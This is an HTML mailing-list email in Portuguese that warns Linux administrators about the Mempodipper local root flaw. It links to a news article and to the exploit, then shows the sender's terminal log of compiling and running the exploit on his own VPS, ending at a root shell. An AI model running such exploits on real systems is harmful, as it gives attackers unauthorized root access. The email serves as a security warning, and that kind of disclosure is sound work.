<html><head></head><body style="word-wrap: break-word; -webkit-nbsp-mode: space; -webkit-line-break: after-white-space; ">Acabei de testar na minha vps,<div><br></div><div><br></div><div><div>mantovani@mantovanilabs:~$ gcc mempodipper.c </div><div>mantovani@mantovanilabs:~$ ls</div><div>a.out apps mempodipper.c Perl perl5</div><div>mantovani@mantovanilabs:~$ chmod +x a.out </div><div>mantovani@mantovanilabs:~$ ./a.out </div><div>===============================</div><div>= Mempodipper =</div><div>= by zx2c4 =</div><div>= Jan 21, 2012 =</div><div>===============================</div><div><br></div><div>[+] Ptracing su to find next instruction without reading binary.</div><div>[+] Creating ptrace pipe.</div><div>[+] Forking ptrace child.</div><div>[+] Waiting for ptraced child to give output on syscalls.</div><div>[+] Ptrace_traceme'ing process.</div><div>[+] Error message written. Single stepping to find address.</div><div>[+] Resolved call address to 0x4020b8.</div><div>[+] Opening socketpair.</div><div>[+] Waiting for transferred fd in parent.</div><div>[+] Executing child from child fork.</div><div>[+] Opening parent mem /proc/16574/mem in child.</div><div>[+] Sending fd 6 to parent.</div><div>[+] Received fd at 6.</div><div>[+] Assigning fd 6 to stderr.</div><div>[+] Calculating su padding.</div><div>[+] Seeking to offset 0x4020ac.</div><div>[+] Executing su with shellcode.</div><div># uname -a</div><div>Linux <a href="http://mantovanilabs.com">mantovanilabs.com</a> 3.0.4-x86_64-linode21 #1 SMP Thu Sep 1 21:28:01 EDT 2011 x86_64 GNU/Linux</div><div><br></div><div apple-content-edited="true">
<div style="word-wrap: break-word; -webkit-nbsp-mode: space; -webkit-line-break: after-white-space; "><span class="Apple-style-span" style="border-collapse: separate; color: rgb(0, 0, 0); font-family: Helvetica; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; -webkit-text-decorations-in-effect: none; -webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; font-size: medium; "><div style="word-wrap: break-word; -webkit-nbsp-mode: space; -webkit-line-break: after-white-space; ">-- <br>Software Engineer<br>Just Another Perl Hacker<br>Daniel Mantovani +5511 8538-9897<br>XOXO</div></span></div>
</div>
<br><div><div>On Jan 27, 2012, at 12:02 PM, Daniel Mantovani wrote:</div><br class="Apple-interchange-newline"><blockquote type="cite"><div style="word-wrap: break-word; -webkit-nbsp-mode: space; -webkit-line-break: after-white-space; "><div><a href="http://www.techworld.com.au/article/413300/linux_vendors_rush_patch_privilege_escalation_flaw_after_root_exploits_emerge">http://www.techworld.com.au/article/413300/linux_vendors_rush_patch_privilege_escalation_flaw_after_root_exploits_emerge</a></div><div>o exploit, <a href="http://www.exploit-db.com/exploits/18411/">http://www.exploit-db.com/exploits/18411/</a></div><div><br></div><div>Atencao administradores, o assunto 'e serio.</div><div><br></div><br><div apple-content-edited="true">
<div style="word-wrap: break-word; -webkit-nbsp-mode: space; -webkit-line-break: after-white-space; "><div style="word-wrap: break-word; -webkit-nbsp-mode: space; -webkit-line-break: after-white-space; ">-- <br>Software Engineer<br>Just Another Perl Hacker<br>Daniel Mantovani +5511 8538-9897<br>XOXO</div></div>
</div>
<br></div></blockquote></div><br></div></body></html>